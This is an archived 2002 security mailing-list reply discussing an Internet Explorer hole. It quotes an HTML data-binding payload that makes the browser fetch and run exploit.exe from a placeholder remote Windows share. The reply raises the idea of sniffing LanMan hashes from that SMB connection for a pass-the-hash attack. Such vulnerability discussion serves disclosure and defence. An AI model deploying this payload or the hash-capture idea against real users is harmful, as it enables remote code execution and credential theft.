Re: Rather large MSIE-hole
From: NoCoNFLiC (nocon@castleblack.darkflame.net)Date: 03/15/02
- Previous message: NoCoNFLiC: "Re: Rather large MSIE-hole"
- In reply to: John Swensson: "RE: Rather large MSIE-hole"
- Next in thread: The Blueberry: "Re: Rather large MSIE-hole"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 15 Mar 2002 09:52:40 -0600 From: NoCoNFLiC <nocon@castleblack.darkflame.net> To: John Swensson <jswensson@integres.com>
[jswensson@integres.com] Thu, Mar 14, 2002 at 04:23:55PM -0800 wrote:
> well if activex is enabled,
>
> doing this with a available readable by everyone windows share works
>
> <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
> <xml id="oExec">
> <security>
> <exploit>
> <![CDATA[
> <object id="oFile"
> classid="clsid:11111111-1111-1111-1111-111111111111"
> codebase="\\xxx.xxx.xxx.xxx\share\exploit.exe"></object>
> ]]>
> </exploit>
> </security>
> </xml>
>
>
I could be wrong, but could this also open the posiblity of a
"pass the hash" type of attack by sniffing the LanMan hash
when the client connects to \\xxx.xxx.xxx.xxx\share\ ?
http://online.securityfocus.com/bid/233
--- nocon
======================================
nocon@darkflame.net http://nocon.darkflame.net
======================================
- Previous message: NoCoNFLiC: "Re: Rather large MSIE-hole"
- In reply to: John Swensson: "RE: Rather large MSIE-hole"
- Next in thread: The Blueberry: "Re: Rather large MSIE-hole"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
